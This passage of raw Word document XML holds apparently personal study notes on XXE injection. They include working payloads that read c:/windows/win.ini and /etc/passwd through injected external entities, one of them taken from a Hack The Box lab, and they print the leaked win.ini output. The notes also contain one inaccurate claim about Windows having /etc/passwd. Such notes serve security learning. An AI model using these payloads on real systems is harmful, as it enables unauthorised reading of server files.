      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you will want to inject some XML code in the line right after the first line. To test to see if it's vulnerable, we can try checking the contents inside of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c:/windows/win.ini</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a legacy configuration file used by older versions of Windows, but it's usually there on all Windows. The expected format is something like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002BFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[fonts]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fixedsys=Fixedsys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C01">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C02">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">txt=notepad.exe ^.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C04">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[mci extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="512"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wav=waveaudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C07">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C08">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="750"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And to attempt to read win.ini, we replace the XML code that we got from the request and turn it into the below. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Send the request to the repeater on burpsuite so you can see the response you get</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM </w:t>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"file:///c:/windows/win.ini"&gt;</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2C0E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C0F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C10">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;quantity&gt;3&lt;/quantity&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C11">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;item&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;xxe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;&lt;/item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C12">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;address&gt;Test Address&lt;/address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C13">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/order&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also test with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:///etc/passwd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since it works for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BOTH LINUX AND WINDOWS since the format "file:///" works for both windows and linux and they both have a /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see, we made this new thing after the first line, and then inside of the "item" tags, we put that variable in. Item is one of the things that accepts text inside of the website. Quantity was a drag and drop so it didn't work when you put the variable inside that. You should see the insides of win.ini, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C17">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C18">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your order for ; for 16-bit app support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C19">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[fonts]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1B">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[mci extensions]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[files]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[Mail]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MAPI=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C1F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[Ports]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C20">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COM1:=9600,n,8,1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C21">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been processed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do, then that means the website is vulnerable to XXE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the BountyHunter HTB, here was how they tested it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C27">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C28">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE data [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C29">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY file SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;title&gt;test&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cwe&gt;test&lt;/cwe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cvss&gt;test&lt;/cvss&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;reward&gt;&amp;file;&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
